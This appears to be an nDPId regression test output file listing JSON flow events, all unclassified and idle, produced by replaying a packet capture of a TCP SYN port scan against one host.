+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 